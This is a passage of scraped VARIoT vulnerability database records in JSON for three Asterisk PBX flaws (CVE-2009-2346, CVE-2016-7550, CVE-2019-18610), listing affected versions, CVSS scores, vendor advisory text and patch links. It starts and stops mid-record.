"url": "http://security.gentoo.org/"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-4055"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2008-7220"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-7220"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2009-2726"
},
{
"trust": 0.1,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2009-2726"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2009-006-1.6.0.diff.txt"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2009-006-1.6.1.diff.txt"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2009-005-1.4.diff.txt"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2009-005-1.6.0.diff.txt"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2009-005-1.6.2.diff.txt"
},
{
"trust": 0.1,
"url": "http://labs.mudynamics.com/advisories/mu-200908-01.txt"
},
{
"trust": 0.1,
"url": "http://downloads.asterisk.org/pub/security/ast-2009-005.html"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2009-005-1.6.1.diff.txt"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2009-005-1.2.diff.txt"
},
{
"trust": 0.1,
"url": "http://downloads.digium.com/pub/security/ast-2009-005-trunk.diff.txt"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2009-2346"
},
{
"db": "BID",
"id": "36275"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-003591"
},
{
"db": "PACKETSTORM",
"id": "75661"
},
{
"db": "PACKETSTORM",
"id": "80978"
},
{
"db": "PACKETSTORM",
"id": "81677"
},
{
"db": "PACKETSTORM",
"id": "90288"
},
{
"db": "PACKETSTORM",
"id": "81003"
},
{
"db": "PACKETSTORM",
"id": "80408"
},
{
"db": "CNNVD",
"id": "CNNVD-200909-091"
},
{
"db": "NVD",
"id": "CVE-2009-2346"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2009-2346"
},
{
"db": "BID",
"id": "36275"
},
{
"db": "JVNDB",
"id": "JVNDB-2009-003591"
},
{
"db": "PACKETSTORM",
"id": "75661"
},
{
"db": "PACKETSTORM",
"id": "80978"
},
{
"db": "PACKETSTORM",
"id": "81677"
},
{
"db": "PACKETSTORM",
"id": "90288"
},
{
"db": "PACKETSTORM",
"id": "81003"
},
{
"db": "PACKETSTORM",
"id": "80408"
},
{
"db": "CNNVD",
"id": "CNNVD-200909-091"
},
{
"db": "NVD",
"id": "CVE-2009-2346"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2009-09-08T00:00:00",
"db": "VULMON",
"id": "CVE-2009-2346"
},
{
"date": "2009-09-03T00:00:00",
"db": "BID",
"id": "36275"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-003591"
},
{
"date": "2009-03-11T08:30:33",
"db": "PACKETSTORM",
"id": "75661"
},
{
"date": "2009-09-04T01:28:46",
"db": "PACKETSTORM",
"id": "80978"
},
{
"date": "2009-09-28T05:54:05",
"db": "PACKETSTORM",
"id": "81677"
},
{
"date": "2010-06-04T05:34:39",
"db": "PACKETSTORM",
"id": "90288"
},
{
"date": "2009-09-04T15:24:50",
"db": "PACKETSTORM",
"id": "81003"
},
{
"date": "2009-08-17T09:58:53",
"db": "PACKETSTORM",
"id": "80408"
},
{
"date": "2009-09-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200909-091"
},
{
"date": "2009-09-08T18:30:00.203000",
"db": "NVD",
"id": "CVE-2009-2346"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-10-10T00:00:00",
"db": "VULMON",
"id": "CVE-2009-2346"
},
{
"date": "2015-04-13T22:21:00",
"db": "BID",
"id": "36275"
},
{
"date": "2012-06-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2009-003591"
},
{
"date": "2009-09-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200909-091"
},
{
"date": "2025-04-09T00:30:58.490000",
"db": "NVD",
"id": "CVE-2009-2346"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "90288"
},
{
"db": "CNNVD",
"id": "CNNVD-200909-091"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Asterisk Open Source of IAX2 Service disruption in protocol implementation (DoS) Vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2009-003591"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200909-091"
}
],
"trust": 0.6
}
}
VAR-201905-0637
Vulnerability from variot - Updated: 2024-11-23 22:58asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote). asterisk Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. DigiumAsterisk is a set of open source telephone exchange (PBX) system software from Digium, USA. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR) and more. A security vulnerability exists in DigiumAsterisk version 13.10.0
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201905-0637",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "eq",
"trust": 2.4,
"vendor": "digium",
"version": "13.10.0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:digium:asterisk",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
}
]
},
"cve": "CVE-2016-7550",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CVE-2016-7550",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-16531",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2016-7550",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2016-7550",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2016-7550",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2019-16531",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-972",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "asterisk 13.10.0 is affected by: denial of service issues in asterisk. The impact is: cause a denial of service (remote). asterisk Is NULL A vulnerability related to pointer dereference exists.Service operation interruption (DoS) There is a possibility of being put into a state. DigiumAsterisk is a set of open source telephone exchange (PBX) system software from Digium, USA. The software supports voicemail, multi-party voice conferencing, interactive voice response (IVR) and more. A security vulnerability exists in DigiumAsterisk version 13.10.0",
"sources": [
{
"db": "NVD",
"id": "CVE-2016-7550"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "CNVD",
"id": "CNVD-2019-16531"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2016-7550",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2019-16531",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
}
]
},
"id": "VAR-201905-0637",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
}
],
"trust": 0.06
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
}
]
},
"last_update_date": "2024-11-23T22:58:40.526000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AST-2016-006",
"trust": 0.8,
"url": "http://downloads.asterisk.org/pub/security/AST-2016-006.html"
},
{
"title": "Patch for DigiumAsterisk Denial of Service Vulnerability (CNVD-2019-16531)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/163053"
},
{
"title": "Digium Asterisk Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=92924"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-476",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "http://downloads.asterisk.org/pub/security/ast-2016-006.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-7550"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-7550"
},
{
"trust": 0.6,
"url": "https://web.nvd.nist.gov//vuln/detail/cve-2016-7550"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
},
{
"db": "NVD",
"id": "CVE-2016-7550"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"date": "2019-06-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"date": "2019-05-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-972"
},
{
"date": "2019-05-23T19:29:00.243000",
"db": "NVD",
"id": "CVE-2016-7550"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2019-16531"
},
{
"date": "2019-06-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2016-009339"
},
{
"date": "2019-05-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201905-972"
},
{
"date": "2024-11-21T02:58:11.820000",
"db": "NVD",
"id": "CVE-2016-7550"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "asterisk In NULL Pointer dereference vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2016-009339"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201905-972"
}
],
"trust": 0.6
}
}
VAR-201911-1169
Vulnerability from variot - Updated: 2024-11-23 21:52An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands. Refer to the vendor information and take appropriate measures. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more.
Affected Versions
Product Release
Series
Asterisk Open Source 13.x All releases
Asterisk Open Source 16.x All releases
Asterisk Open Source 17.x All releases
Certified Asterisk 13.21 All releases
Corrected In
Product Release
Asterisk Open Source 13.29.2
Asterisk Open Source 16.6.2
Asterisk Open Source 17.0.1
Certified Asterisk 13.21-cert5
Patches
SVN URL Revision
http://downloads.asterisk.org/pub/security/AST-2019-007-13.diff Asterisk 13
http://downloads.asterisk.org/pub/security/AST-2019-007-16.diff Asterisk 16
http://downloads.asterisk.org/pub/security/AST-2019-007-17.diff Asterisk 17
http://downloads.asterisk.org/pub/security/AST-2019-007-13.21.diff Certified
Asterisk
13.21-cert5
Links https://issues.asterisk.org/jira/browse/ASTERISK-28580
Asterisk Project Security Advisories are posted at
http://www.asterisk.org/security
This document may be superseded by later versions; if so, the latest
version will be posted at
http://downloads.digium.com/pub/security/AST-2019-007.pdf and
http://downloads.digium.com/pub/security/AST-2019-007.html
Revision History
Date Editor Revisions Made
October 24, 2019 George Joseph Initial Revision
November 21, 2019 Ben Ford Added “Posted On” date
Asterisk Project Security Advisory - AST-2019-007
Copyright © 2019 Digium, Inc. All Rights Reserved.
Permission is hereby granted to distribute and publish this advisory in its original, unaltered form
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201911-1169",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "13.29.2"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 1.0,
"vendor": "digium",
"version": "13.21.0"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "16.0.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "16.6.2"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "17.0.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"model": "asterisk",
"scope": "gte",
"trust": 1.0,
"vendor": "digium",
"version": "13.0.0"
},
{
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "9.0"
},
{
"model": "asterisk",
"scope": "lt",
"trust": 1.0,
"vendor": "digium",
"version": "17.0.1"
},
{
"model": "gnu/linux",
"scope": null,
"trust": 0.8,
"vendor": "debian",
"version": null
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.8,
"vendor": "digium",
"version": "13.x"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "16.x"
},
{
"model": "asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "17.x"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 0.8,
"vendor": "digium",
"version": "13.21 to 13.21-cert4"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=13.*"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=16.*"
},
{
"model": "asterisk",
"scope": "lte",
"trust": 0.6,
"vendor": "sangoma",
"version": "\u003c=17.*"
},
{
"model": "certified asterisk",
"scope": "eq",
"trust": 0.6,
"vendor": "sangoma",
"version": "13.21"
},
{
"model": "certified asterisk 13.21-cert4",
"scope": null,
"trust": 0.6,
"vendor": "sangoma",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:debian:debian_linux",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:digium:asterisk",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/a:digium:certified_asterisk",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "gjoseph",
"sources": [
{
"db": "PACKETSTORM",
"id": "155435"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
}
],
"trust": 0.7
},
"cve": "CVE-2019-18610",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CVE-2019-18610",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.0,
"id": "CNVD-2020-03060",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2019-18610",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2019-18610",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-18610",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2019-18610",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2020-03060",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201911-1290",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-03060"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-012584"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1290"
},
{
"db": "NVD",
"id": "CVE-2019-18610"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered in manager.c in Sangoma Asterisk through 13.x, 16.x, 17.x and Certified Asterisk 13.21 through 13.21-cert4. A remote authenticated Asterisk Manager Interface (AMI) user without system authorization could use a specially crafted Originate AMI request to execute arbitrary system commands. Refer to the vendor information and take appropriate measures. Sangoma Technologies Asterisk is an open source telephone exchange (PBX) system software. The software supports voice mail, multi-party voice conferencing, interactive voice response (IVR), and more. \n\n Affected Versions \n Product Release \n Series \n Asterisk Open Source 13.x All releases \n Asterisk Open Source 16.x All releases \n Asterisk Open Source 17.x All releases \n Certified Asterisk 13.21 All releases \n\n Corrected In \n Product Release \n Asterisk Open Source 13.29.2 \n 